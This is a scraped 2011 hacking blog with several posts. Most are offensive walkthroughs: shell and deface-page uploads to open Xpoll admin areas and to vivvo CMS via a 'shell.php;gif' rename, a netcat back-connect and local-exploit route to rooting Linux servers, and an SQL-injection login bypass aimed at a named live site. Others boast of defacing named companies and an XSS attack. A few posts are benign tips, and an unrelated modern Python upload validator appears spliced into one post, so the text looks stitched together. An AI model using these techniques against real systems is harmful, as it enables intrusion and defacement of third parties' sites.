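    print("watching:", ", ".join(f"{p}/{n}" for p, n in bound))
    while True:
        for ev in poll_once(sel):
            print("\a" + format_event(ev), flush=True)  # \a = alert sound
```

Run it before other network services start, so the ports it should watch are still free.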
<br />
<br /><div class="separator" style="clear: both; text-align: center; "><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHXt9p4Xm8qUR818SmxRWce3ni6TfoBRrCH-7tPgB_piogwU0uGRS6gmolWQ0yF4FigGg0wdwJH8sd3tpuaBcvOsuvHsHdzGgkcDBwlPMP8FEmvxzCW1iof8dmdZhr-ysseNLOfUEG0Bg/s1600/untitled+%25281%2529.jpg" imageanchor="1" style="color: rgb(242, 131, 6); text-decoration: underline; outline-style: none; outline-width: initial; outline-color: initial; margin-left: 1em; margin-right: 1em; "><img border="0" height="280" width="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHXt9p4Xm8qUR818SmxRWce3ni6TfoBRrCH-7tPgB_piogwU0uGRS6gmolWQ0yF4FigGg0wdwJH8sd3tpuaBcvOsuvHsHdzGgkcDBwlPMP8FEmvxzCW1iof8dmdZhr-ysseNLOfUEG0Bg/s400/untitled+%25281%2529.jpg" alt="untitled%2B%25281%2529" title="untitled%2B%25281%2529" style="border-top-width: 4px; border-right-width: 4px; border-bottom-width: 4px; border-left-width: 4px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-top-color: rgb(227, 226, 226); border-right-color: rgb(227, 226, 226); border-bottom-color: rgb(227, 226, 226); border-left-color: rgb(227, 226, 226); background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(255, 255, 255); margin-top: 0px; margin-right: 4px; margin-bottom: 4px; margin-left: 0px; border-width: initial; border-color: initial; background-position: initial initial; background-repeat: initial initial; " /></a></div>
<br />
<br />Within minutes of installing this small honeypot I got the scanning alert sound; when checked, these were the UDP packets mainly left over the internet for scanning of hosts.</div></div></div></span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8876165229323819727.post-21443993976526644362011-08-28T02:12:00.000-07:002011-08-28T02:22:03.806-07:00Hack Website Through Exploit of Xpoll Admin<div><span class="Apple-style-span">First of all, open </span></div><div><span class="Apple-style-span">
<br /></span></div><div><span class="Apple-style-span">http://google.com</span></div><div>
<br /></div><div><span class="Apple-style-span">Then type xpoll admin </span></div><div><span class="Apple-style-span">in the search bar </span></div><div><span class="Apple-style-span">
<br /></span></div><div><span class="Apple-style-span">After you hit search you will see many sites found by Google. </span></div><div><span class="Apple-style-span">Now open the sites and you will get an open admin image upload area where you can upload your </span></div><div><span class="Apple-style-span">deface page or shell, or you can upload your image too. </span></div><div><span class="Apple-style-span">
<br /></span></div><div><span class="Apple-style-span">Once you have uploaded your deface page, </span></div><div><span class="Apple-style-span">remove /admin from the URL and after images/ type your deface page name, hitcher101.html in my case. </span></div><div>
<br /></div><div><span class="Apple-style-span">Demo </span></div><div><a href="http://www.rasanet.com/fa/xpoll/admin/images/index.php">http://www.rasanet.com/fa/xpoll/admin/images/index.php</a></div><div><a href="http://www.rasanet.com/fa/xpoll/images/hitcher101.html">http://www.rasanet.com/fa/xpoll/images/hitcher101.html</a></div><div><a href="http://legend-h.org/mirror/211956/rasanet.com/fa/xpoll/images/hitcher101.html">http://legend-h.org/mirror/211956/rasanet.com/fa/xpoll/images/hitcher101.html</a></div><div>
<br /></div><div><span class="Apple-style-span">Enjoy it </span></div><div>
<br /></div><div>
<br /></div><div>
<br /></div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8876165229323819727.post-32462053979162916992011-08-20T01:20:00.000-07:002011-08-20T01:26:08.132-07:00Save your Facebook account from Malicious script scam<span class="Apple-style-span" style="color: rgb(51, 51, 51); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 16px; background-color: rgb(255, 255, 255); "><div>First of all, what is a malicious script scam?</div><div>
<br /></div>In a <b>malicious script scam</b> you are asked to copy and paste text into your browser’s address bar in order to see something interesting or surprising, for example who viewed your profile.
<br />
<br /><img src="https://fbcdn-sphotos-a.akamaihd.net/hphotos-ak-ash4/230729_10150184586289887_119341934886_6667693_4831432_n.jpg" style="border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; " />
<br />This "code" is actually a malicious script. Instead of showing you what was advertised, it uses your account to create events and pages and send your friends spam.
<br /></span><div><span class="Apple-style-span" style="color: rgb(51, 51, 51); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 16px; background-color: rgb(255, 255, 255); ">
<br /></span></div><div><span class="Apple-style-span" style="color: rgb(51, 51, 51); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 16px; background-color: rgb(255, 255, 255); "><b>Stay Safe </b>
<br />
<br />Spammers often advertise surprising things like (ex: the opportunity to see who viewed your profile) to try to lure people into their spam traps.<ul class="uiList uiListBulleted" style="list-style-type: square; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 12px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; color: rgb(59, 89, 152); "><li class="uiListVerticalItemBorder" style="border-top-width: 1px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; "><div class="fcb" style="color: rgb(51, 51, 51); ">Never click on suspicious links, even if they’re sent by your friends.</div></li><li class="uiListVerticalItemBorder" style="border-top-width: 1px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; "><div class="fcb" style="color: rgb(51, 51, 51); ">Never copy and paste text into your internet browser address bar if you are unsure of what it is.</div><div class="fcb" style="color: rgb(51, 51, 51); ">Learn more about<a href="http://hitcher-hackyou.blogspot.com/"> <span class="Apple-style-span" ><span class="Apple-style-span" style="cursor: pointer;"><u>keeping your account secure</u></span></span>.</a></div></li></ul></span></div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8876165229323819727.post-49308739066183013752011-08-11T11:39:00.000-07:002011-08-11T11:44:55.492-07:00Ntkod company___and___Capital DGR Company LTD Of Israel is Hacked By Hitcher<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgayQeBw2VKGxOqFpD8r56jpQ-sxFrHOThVRIYNYOCcXgC02pdl81XNUTemP-XqPoM4gUlXiD0GNSkSu0r5b4gI0MzzSZL84geKDyEnmlEgpsT1pctN_xZZ9_fgCiRVjXvB3tgdw25FO5xh/s1600/NEWHACK.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 200px;" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgayQeBw2VKGxOqFpD8r56jpQ-sxFrHOThVRIYNYOCcXgC02pdl81XNUTemP-XqPoM4gUlXiD0GNSkSu0r5b4gI0MzzSZL84geKDyEnmlEgpsT1pctN_xZZ9_fgCiRVjXvB3tgdw25FO5xh/s400/NEWHACK.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5639670593120183666" /></a><span class="Apple-style-span" style="color: rgb(51, 255, 51); ">
<br /></span><div><span class="Apple-style-span">Ntkod company is one of the leading companies in the field of barcode and data collection in Israel</span>
<br /><div>
<br /></div><div>
<br /></div><div><a href="http://www.netcode.co.il/pcf.html">http://www.netcode.co.il/pcf.html</a></div><div><a href="http://k0-ka.in/attack/?id=32308">http://k0-ka.in/attack/?id=32308</a></div><div><a href="http://legend-h.org/mirror/204719/ne...co.il/pcf.html">http://legend-h.org/mirror/204719/ne...co.il/pcf.html</a></div><div>
<br /></div><div>
<br /></div><div><span class="Apple-style-span">Capital DGR Company LTD Of Israel </span></div><div>
<br /></div><div><a href="http://www.dgr.co.il/pcf.html">http://www.dgr.co.il/pcf.html</a></div><div><a href="http://k0-ka.in/attack/?id=32309">http://k0-ka.in/attack/?id=32309</a></div></div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8876165229323819727.post-54445995286385092642011-07-28T03:43:00.000-07:002011-07-28T04:03:41.970-07:00How To Get Back The Old Facebook Chat Box<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7oVsAXJIOc7kec5mUsYkIU0Y3lDmVU4x2oSzBQ7g_rf0dL_WQEH5SEaXqn0497jNMmguM9_WkzKEsNPAJPRcuamgMsjWmgbI8piFzMEX4cxZDFv-fyEI9uPG1mXw_wkGt7RahhG-ojblP/s1600/fbchat.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 400px; height: 298px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7oVsAXJIOc7kec5mUsYkIU0Y3lDmVU4x2oSzBQ7g_rf0dL_WQEH5SEaXqn0497jNMmguM9_WkzKEsNPAJPRcuamgMsjWmgbI8piFzMEX4cxZDFv-fyEI9uPG1mXw_wkGt7RahhG-ojblP/s400/fbchat.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5634355875446917042" /></a><br /><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /><span class="Apple-style-span">The Trick I will be tell you will be work On <span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 20px; ">Firefox and Chrome </span></span><div><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 20px; ">If you are using Chrome than you don't need of download </span><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 20px; ">Greasemonkey addon but if you are using Firefox than with out Greasemonkey addon this Script will not be run</span></div><div><span 
class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 20px; "><br /></span></div><div><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 20px; "><span class="Apple-style-span">First step Download Greasemonkey for Mozilla Firefox over </span><span class="Apple-style-span"><a alt="Install" href="https://addons.mozilla.org/firefox/downloads/latest/748/addon-748-latest.xpi?src=addondetail" target="_blank" title="Install" style="text-decoration: underline; outline-style: none; outline-width: initial; outline-color: initial; ">here</a>.</span></span><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 20px; "> Install it. This is only for Firefox, if you’re on Chrome then start with the second step skip the first step </span></div><div><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif; line-height: 20px; "><br /></span></div><div><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', Times, serif; line-height: 22px; "><span class="Apple-style-span">Second step now you need to download a userscript known as Facebook Sidebar Chat Reversion on both Chrome and Firefox. 
Get it from </span><span class="Apple-style-span"><a alt="Install" href="http://userscripts.org/scripts/source/107159.user.js" target="_blank" title="Install" style="text-decoration: underline; outline-style: none; outline-width: initial; outline-color: initial; ">here</a>.</span></span></div><div><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', Times, serif; line-height: 22px; "><span class="Apple-style-span"><br /></span></span></div><div><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', Times, serif; line-height: 22px; "><span class="Apple-style-span">Enjoy the old Facebook chat box</span></span></div><div><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', Times, serif; line-height: 22px; "><span class="Apple-style-span"><br /></span></span></div><div><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 22px; ">Regards</span></span><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', Times, serif; line-height: 22px; "><span class="Apple-style-span"> <span class="Apple-style-span">Hitcher </span> </span></span></div><div><span class="Apple-style-span" style="color: rgb(117, 116, 116); font-family: Georgia, 'Times New Roman', Times, serif; line-height: 22px; "><br /></span></div><div><span class="Apple-style-span" style="color: rgb(117, 116, 116); font-family: Georgia, 'Times New Roman', Times, serif; font-size: 12px; line-height: 22px; "><br /></span></div></div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8876165229323819727.post-26757982291377933292011-07-21T06:13:00.000-07:002011-07-21T06:18:49.417-07:00Rooting a Linux Servers<span class="Apple-style-span" style="font-family: sans-serif; font-size: 13px; line-height: 18px; ">Post Author Is </span><span class="Apple-style-span"><span class="Apple-style-span" style="line-height: 18px;"><b><br /></b></span></span><span class="Apple-style-span" style="font-family: 
sans-serif; font-size: 13px; line-height: 18px; "><span class="largetext" style="font-size: 16px; "><span class="Apple-style-span" style="outline-style: none; outline-width: initial; outline-color: initial; -webkit-background-clip: padding-box; text-decoration: none; "><b><span class="Apple-style-span" style="outline-width: initial; outline-color: initial; -webkit-background-clip: padding-box;">ch3</span>_hacker </b></span></span></span><span class="Apple-style-span" style="font-family: sans-serif; font-size: 13px; line-height: 18px; "><div><br /></div></span><span class="Apple-style-span" style="font-family: sans-serif; font-size: 13px; line-height: 18px; "><div><span class="Apple-style-span" style="font-family: sans-serif; font-size: 13px; line-height: 18px; "><br /></span></div><div><span class="Apple-style-span" style="font-family: sans-serif; font-size: 13px; line-height: 18px; "><br /></span></div>First of all to be locked in by SSH shell should connect us with netcat which can be downloaded here<br />Put netcat to the desktop and go to cmd<br /><br /><div class="codeblock" style="background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(255, 255, 255); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(204, 204, 204); border-right-color: rgb(204, 204, 204); border-bottom-color: rgb(204, 204, 204); border-left-color: rgb(204, 204, 204); padding-top: 4px; padding-right: 4px; padding-bottom: 4px; padding-left: 4px; background-position: initial initial; background-repeat: initial initial; "><div class="title" style="border-bottom-width: 1px; border-bottom-style: solid; border-bottom-color: rgb(204, 204, 204); font-weight: bold; margin-top: 4px; margin-right: 0px; margin-bottom: 4px; margin-left: 0px; ">Code:<br 
/></div><div class="body" dir="ltr"><code style="overflow-x: auto; overflow-y: auto; height: auto; max-height: 200px; display: block; font-family: Monaco, Consolas, Courier, monospace; font-size: 13px; ">cd Desktop<br />nc -lvp 1337</code></div></div>1337 = Port for netcat<br /><br /><img src="http://i.imgur.com/8M3cD.png" border="0" alt="[Image: 8M3cD.png]" style="border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-width: initial; border-color: initial; " /><br /><br />Now we need to connect to IP Sound from the shell, shell must have back-Connect tool as follows:<br /><br /><img src="http://i.imgur.com/MwXGv.png" border="0" alt="[Image: MwXGv.png]" style="border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-width: initial; border-color: initial; " /><br /><br />If everything has succeeded so far are associated with success in SSH Mode:<br /><br />Now to obtain Root Access, we have adapted to exploit the server - You can also find in google<br />Now upload exploit:<br /><br /><img src="http://i.imgur.com/lqsPx.png" border="0" alt="[Image: lqsPx.png]" style="border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-width: initial; border-color: initial; " /><br /><br />After you have uploaded execute these commands:<br /><div class="codeblock" style="background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(255, 255, 255); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(204, 204, 204); border-right-color: rgb(204, 204, 204); border-bottom-color: rgb(204, 204, 204); border-left-color: rgb(204, 204, 204); padding-top: 4px; padding-right: 4px; 
padding-bottom: 4px; padding-left: 4px; background-position: initial initial; background-repeat: initial initial; "><div class="title" style="border-bottom-width: 1px; border-bottom-style: solid; border-bottom-color: rgb(204, 204, 204); font-weight: bold; margin-top: 4px; margin-right: 0px; margin-bottom: 4px; margin-left: 0px; ">Code:<br /></div><div class="body" dir="ltr"><code style="overflow-x: auto; overflow-y: auto; height: auto; max-height: 200px; display: block; font-family: Monaco, Consolas, Courier, monospace; font-size: 13px; ">chmod 777 1<br />./1</code></div></div><br />1 (is exploit) - chmod 777 (Provision of access to file) -. / (Execution exploit)<br /><br /><img src="http://i.imgur.com/77pbG.png" border="0" alt="[Image: 77pbG.png]" style="border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-width: initial; border-color: initial; " /><br /><br />Now the server has become full root access<br />You can change password with passwd command and connect to Putty.</span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8876165229323819727.post-74273688966583494452011-07-15T05:40:00.000-07:002011-07-15T05:44:43.272-07:00XSS Attack on Delhi Chamber Of Commerce by Hitcher<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRVi-su-Vtyj44HXfki2sm0lOpyxkRJjNxjv2LmiwOJClhCHVTNtS1ZAKL5znokHnD4nExchuWZ0PUhWyOJ1e_0ib2OZvfS1XO0HdJtCPy0PdDKE9Z8rkYQy0tEKNk8z0mCSMC3RIwnnbp/s1600/Delhi+Chamber+OF+Commerce.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 400px; height: 291px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRVi-su-Vtyj44HXfki2sm0lOpyxkRJjNxjv2LmiwOJClhCHVTNtS1ZAKL5znokHnD4nExchuWZ0PUhWyOJ1e_0ib2OZvfS1XO0HdJtCPy0PdDKE9Z8rkYQy0tEKNk8z0mCSMC3RIwnnbp/s400/Delhi+Chamber+OF+Commerce.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5629558988889009714" /></a><br /><span 
class="Apple-style-span" style="border-collapse: collapse; font-family: arial, sans-serif; font-size: 13px; "><br /></span><div><span class="Apple-style-span" style="border-collapse: collapse; font-family: arial, sans-serif; font-size: 13px; "><br /></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; font-family: arial, sans-serif; font-size: 13px; "><br /></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; font-family: arial, sans-serif; font-size: 13px; "><br /></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; font-family: arial, sans-serif; font-size: 13px; "><br /></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; font-family: arial, sans-serif; font-size: 13px; "><br /></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; font-family: arial, sans-serif; font-size: 13px; "><br /></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; font-family: arial, sans-serif; font-size: 13px; "><br /></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; font-family: arial, sans-serif; font-size: 13px; "><br /></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; font-family: arial, sans-serif; font-size: 13px; "><br /></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; font-family: arial, sans-serif; font-size: 13px; "><br /></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; font-family: arial, sans-serif; font-size: 13px; "><br /></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; font-family: arial, sans-serif; font-size: 13px; "><br /></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; font-family: arial, sans-serif; font-size: 13px; "><br /></span></div><div><span class="Apple-style-span" 
style="border-collapse: collapse; font-family: arial, sans-serif; font-size: 13px; "><br /></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; font-family: arial, sans-serif; font-size: 13px; "><br /></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; font-family: arial, sans-serif; font-size: 13px; "><br /></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; font-family: arial, sans-serif; font-size: 13px; "><br /></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; font-family: arial, sans-serif; font-size: 13px; ">XSS Attack on Delhi Chamber Of Commerce by Hitcher</span><div><span class="Apple-style-span" ><span class="Apple-style-span" style="border-collapse: collapse;"><br /></span></span></div><div><span class="Apple-style-span" style="border-collapse: collapse; font-family: arial, sans-serif; font-size: 13px; ">Vulnerable link address <a href="http://bit.ly/nEzqPb" target="_blank" style="color: rgb(0, 84, 136); ">http://bit.ly/nEzqPb</a></span></div></div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8876165229323819727.post-67045287793967999672011-07-11T13:20:00.000-07:002011-07-11T13:23:37.270-07:00vivvo CMS File Upload Vulnerability<span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 12px; ">< ------------------- header data start ------------------- > </span><div><span class="Apple-style-span" ><span class="Apple-style-span" style="font-size: 12px;"><br /></span></span></div><div><span class="Apple-style-span" ><span class="Apple-style-span" style="font-size: 12px;"><br /></span></span><div><span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 12px; ">Application Name : vivvo CMS </span></div><div><span class="Apple-style-span" style="font-family: verdana, geneva, 
lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 12px; ">Vulnerable Type : FileUpload </span></div><div><span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 12px; ">Infection : We can upload the shell. </span></div><div><span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 12px; ">author : hitcher </span></div><div><span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 12px; ">Demo : http://demo.myvivvo.com </span></div><div><span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 12px; "> </span></div><div><span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 12px; ">Login to Administrator Panel and go to : http://demo.myvivvo.com/admin/assets.php Click File Uploads </span></div><div><span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 12px; ">» After, your shell must be (*.jpg), you can rename your shell (*shell.php;gif) Upload. Shell Uploaded. 
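<br />Both this upload flaw and the open Xpoll image upload area described earlier come down to the server trusting the client's file name. The following is an added example, not code from vivvo, Xpoll or the post's author: a hypothetical weak check that accepts `shell.php;gif`, beside a stricter validator that allows one image extension, checks the file signature and stores the file under a server-chosen name. All function names and sample inputs are constructed for illustration.

```python
"""Upload name handling: a weak suffix check beside an allowlist validator."""
import re
import secrets

# Extension allowlist with the leading bytes each format must start with.
IMAGE_MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# Exactly one dot: a plain stem, then a short alphanumeric extension.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9_-]{0,63}\.[A-Za-z0-9]{1,5}")


class UploadRejected(ValueError):
    """Raised when an upload fails validation."""


def naive_is_image(client_name):
    """Hypothetical weak check (an assumption: the page does not show the
    CMS's code). It only looks at how the name ends, so 'shell.php;gif'
    passes even though the web server may still treat it as PHP."""
    return client_name.lower().endswith(("jpg", "gif", "png"))


def validate_upload(client_name, content):
    """Return the server-chosen storage name, or raise UploadRejected."""
    # Drop any directory part the client sent (both separator styles).
    base = client_name.replace("\\", "/").rsplit("/", 1)[-1]
    if not SAFE_NAME.fullmatch(base):
        raise UploadRejected("name must be <stem>.<ext>, no extra dots or punctuation")
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in IMAGE_MAGIC:
        raise UploadRejected("extension ." + ext + " is not an allowed image type")
    if not content.startswith(IMAGE_MAGIC[ext]):
        raise UploadRejected("content does not start with the signature for ." + ext)
    # The client's name is never used on disk. A signature check alone does not
    # stop image/script polyglots; the random name with an image extension,
    # in a directory where script execution is disabled, is what contains them.
    return secrets.token_hex(16) + "." + ext


def check(client_name, content):
    """Convenience wrapper returning ('stored', name) or ('rejected', reason)."""
    try:
        return ("stored", validate_upload(client_name, content))
    except UploadRejected as exc:
        return ("rejected", str(exc))


# Constructed sample uploads (names taken from the page, contents are placeholders).
SAMPLES = [
    ("photo.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 16),
    ("shell.php;gif", b"GIF89a" + b"\x00" * 16),
    ("shell.php.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 16),
    ("hitcher101.html", b"<html></html>"),
]

if __name__ == "__main__":
    for name, body in SAMPLES:
        print(f"{name!r:20} naive={naive_is_image(name)!s:5} strict={check(name, body)}")
```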
</span></div><div><span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 12px; "><span><br /><br /></span></span></div></div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8876165229323819727.post-62993717342936204262011-07-10T02:40:00.000-07:002011-07-10T03:00:36.806-07:00Vulnerability CosmoQuest bypass the login page<span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; "><b><span class="Apple-style-span">CosmoQuest Vulnerability founded<br /></span></b></span><div><span class="Apple-style-span" style="font-size: 12px;"><b><br /></b></span></div><div><span class="Apple-style-span" style="font-size: 12px;"><b>" TUTOR Hitcher "</b></span></div><div><span class="Apple-style-span"><span class="Apple-style-span" style="font-size: 12px;"><b> </b></span><span class="Apple-style-span" style="font-size: 12px; "><b><br /></b></span></span></div><div><div><span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 12px; "><span>Bypass the login page Google dot :</span></span><span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 12px; ">"Powered By CosmoQuest"</span></div><div><span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 12px; "><span>and the Exploit to use is </span></span><span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 12px; ">/AdminLogin.asp</span></div><div><span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 12px; "><span>example ::site.com/AdminLogin.asp use to bypass input </span></span></div><div><span 
class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 12px; "><span><br /></span></span></div><div><span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 12px; "><span>user: 'or''='</span></span></div><div><span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 12px; "><span>password: </span></span><span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 12px; ">'or''=''</span></div><div><span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 12px; "><br /></span></div><div><span class="Apple-style-span" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 12px; ">try on this site </span><a href="http://www.amskrupajal.org/">http://www.amskrupajal.org</a></div></div><div><br /></div><div>Enjoy it </div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8876165229323819727.post-55836780771278340202011-07-08T02:40:00.000-07:002011-07-08T02:44:11.380-07:00Use USB to Lock Your Computer<span class="Apple-style-span" style="color: rgb(64, 63, 63); font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; ">1. Download predator software by clicking <span style="color: rgb(0, 0, 0); text-decoration: underline; outline-style: none; outline-width: initial; outline-color: initial; font-weight: bold; "><a href="http://www.montpellier-informatique.com/predator/en/index.php?n=Main.HomePage">here </a></span><br /><br />2. Predator will get launched automatically after completing installation if not you can run it from <span style="font-weight: bold; ">Start/Programs/Predator</span><br /><br />3. Now Insert your Usb. 
You will get a message to define your new password (this process will not format your pen drive, and the data on it will not be affected at all)<br /><br /><img alt="" border="0" id="BLOGGER_PHOTO_ID_5606623741147034930" src="http://2.bp.blogspot.com/-ILau_fCZBWw/Tc66lmBXNTI/AAAAAAAAFOs/77YDthATMsM/s400/predator_lock%2B1.JPG" style="max-width: 99%; padding-top: 6px; padding-right: 6px; padding-bottom: 6px; padding-left: 6px; background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(255, 255, 255); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(228, 226, 226); border-right-color: rgb(228, 226, 226); border-bottom-color: rgb(228, 226, 226); border-left-color: rgb(228, 226, 226); margin-top: 0px; margin-right: auto; margin-bottom: 10px; margin-left: auto; display: block; height: 171px; text-align: center; width: 322px; background-position: initial initial; background-repeat: initial initial; " /><br /><br />4. Click on OK and enter your new password in the next dialog box.<br /><br />5. Check that the drive letter displayed under “USB key drive” actually matches your flash drive, or choose the correct letter from the dropdown list.<br /><br />6. 
